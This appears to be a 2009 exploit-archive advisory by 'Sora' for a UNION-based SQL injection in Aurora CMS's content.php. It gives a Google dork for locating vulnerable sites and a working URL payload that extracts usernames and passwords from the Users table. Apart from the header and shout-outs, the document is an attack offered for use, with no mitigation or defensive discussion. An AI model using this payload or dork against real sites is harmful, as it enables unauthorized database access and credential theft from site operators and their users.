# Exploit Title: Aurora CMS Remote SQL Injection Exploit [content.php] # Date: December 22nd, 2009 # Author: Sora # Software Link: http://www.auroracms.com.au/ # Version: 1.0, 2.0, and 3.0 # Tested on: Windows and Linux ------------------------------------------------ > Aurora CMS Remote SQL Injection Exploit > Vulnerability in: content.php > Found and disclosed by: Sora > Contact: vhr95zw [at] hotmail.com > Google dork: "Aurora CMS" Aurora CMS suffers a remote SQL injection exploit in content.php. The type is UNION statement SQL injection. # Code: http://www.site.com/content.php?id=-5+UNION+SELECT+ALL+1,2,3,4,group_concat(Username,0x3a,Password)+from+Users-- # Greetz: Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H]aruhiSuzumiya, and Revelation!